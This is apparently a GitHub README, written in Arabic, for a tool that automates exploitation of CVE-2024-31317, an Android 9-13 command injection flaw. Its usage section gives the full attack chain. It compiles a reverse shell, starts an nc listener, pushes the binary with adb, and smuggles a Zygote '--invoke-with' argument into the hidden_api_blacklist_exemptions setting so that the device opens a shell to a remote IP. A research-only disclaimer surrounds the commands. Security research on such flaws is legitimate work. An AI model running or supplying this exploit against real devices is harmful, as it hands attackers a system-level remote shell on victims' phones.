
أداة نشر تلقائية لـ CVE-2024-31317، وهي ثغرة حقن أوامر في Android 9-13. تتضمن حمولة قشرة عكسية وسكربت تجميع وتحليل فني للبحث والتعليم الأمني.
هذا المشروع مخصص فقط لأغراض البحث الأمني والتعليم. استخدام هذه الأداة في اختبارات غير مصرح بها غير قانوني. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر.
CVE-2024-31317 هو ثغرة أمنية خطيرة تؤثر على أجهزة Android من الإصدار 9 إلى 13، وتسمح للتطبيقات التي لديها إذن WRITE_SECURE_SETTINGS بالحصول على صلاحيات مستوى النظام من خلال حقن الأوامر.
يوفر هذا المشروع تحليلاً تقنياً مفصلاً للثغرة، وكوداً لإثبات المفهوم، وأداة نشر آلية.
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer
chmod +x compile.sh
./compile.sh
# تشغيل المستمع
nc -lvnp 4444
# دفع وتنفيذ
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell
# حقن الحمولة
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"
# تشغيل الثغرة
adb shell stop && adb shell start
هذا المشروع مخصص فقط لأغراض البحث الأمني والتعليم. باستخدام هذه الأداة، فإنك توافق على:
هذا المشروع مرخص بموجب رخصة MIT - انظر ملف LICENSE للحصول على التفاصيل
fcy10012 - GitHub
المشروع المرجعي: WebLDix/CVE-2024-31317-PoC-Deployer
⭐ إذا كان هذا المشروع مفيداً لك، يرجى منحه نجمة!